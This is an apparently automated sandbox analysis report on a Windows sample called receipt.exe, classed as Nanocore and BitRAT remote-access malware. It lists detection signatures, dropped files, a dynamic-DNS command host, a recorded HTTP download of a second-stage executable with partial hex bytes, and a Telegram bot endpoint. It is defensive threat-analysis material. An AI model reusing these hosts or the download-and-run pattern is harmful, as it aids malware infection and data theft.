Windows Analysis Report
receipt.exe

Overview

General Information

Sample Name: receipt.exe
Analysis ID: 712166
MD5: 220925c99e482fd480dedb37ca1b59d3
SHA1: 828278c1467af367892469cbced139533ecce7e1
SHA256: e2340403396069b5ca3a235a66889abf2540c8e382bff1cb704ef2cdb13dade9
Tags: exeNanoCoreRAT
Infos:

Detection

Nanocore, BitRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected BitRAT
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected Nanocore RAT
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: receipt.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe Avira: detection malicious, Label: ADWARE/FileFinder.Gen7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe Avira: detection malicious, Label: TR/Redcap.cskpb
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Avira: detection malicious, Label: HEUR/AGEN.1231952
Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe Avira: detection malicious, Label: TR/Redcap.cskpb
Source: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe Avira: detection malicious, Label: HEUR/AGEN.1231952
Yara detected Nanocore RAT
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR
Machine Learning detection for sample
Source: receipt.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 26.0.receipt.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: time[1].exe.25.dr Binary or memory string: -----BEGIN PUBLIC KEY-----
Uses 32bit PE files
Source: receipt.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: receipt.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: uzu.duckdns.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Sep 2022 22:54:15 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Mon, 12 Sep 2022 12:14:40 GMTAccept-Ranges: bytesContent-Length: 8177152Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fa 95 65 d9 be f4 0b 8a be f4 0b 8a be f4 0b 8a 0a 68 fa 8a a0 f4 0b 8a 0a 68 f8 8a 79 f4 0b 8a 0a 68 f9 8a 9a f4 0b 8a 20 54 cc 8a b8 f4 0b 8a 85 aa 08 8b a2 f4 0b 8a 29 86 0f 8b d9 f5 0b 8a 29 aa 0e 8b b4 f4 0b 8a 29 aa 0f 8b e2 f4 0b 8a 63 0b db 8a ba f4 0b 8a 63 0b da 8a bf f4 0b 8a 63 0b c0 8a bd f4 0b 8a be f4 0a 8a fb f6 0b 8a 5b ad 0e 8b bc f4 0b 8a 63 0b c5 8a bb f4 0b 8a 85 aa 0f 8b 94 f4 0b 8a 85 aa 0e 8b 3b f4 0b 8a 29 aa 02 8b 34 f4 0b 8a 2c aa f4 8a bf f4 0b 8a 29 aa 09 8b bf f4 0b 8a 52 69 63 68 be f4 0b 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c4 d4 db 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e2 2d 00 00 e0 4e 00 00 00 00 00 52 97 28 00 00 10 00 00 00 00 2e 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 7d 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a8 38 00 28 00 00 00 00 90 3a 00 28 9c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 7b 00 cc 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 95 34 00 18 00 00 00 d0 a0 32 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 00 d8 03 00 00 5c 8b 38 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d e1 2d 00 00 10 00 00 00 e2 2d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 bf 0a 00 00 00 2e 00 00 c0 0a 00 00 e6 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 9c 01 00 00 c0 38 00 00 22 01 00 00 a6 38 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 11 00 00 00 60 3a 00 00 12 00 00 00 c8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 80 3a 00 00 02 00 00 00 da 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 40 00 00 90 3a 00 00 9e 40 00 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 4a 02 00 00 30 7b 00 00 4c 02 00 00 7a 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /time.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: servproviders.com.brConnection: Keep-Alive
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.545604366.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: time[1].exe.25.dr String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
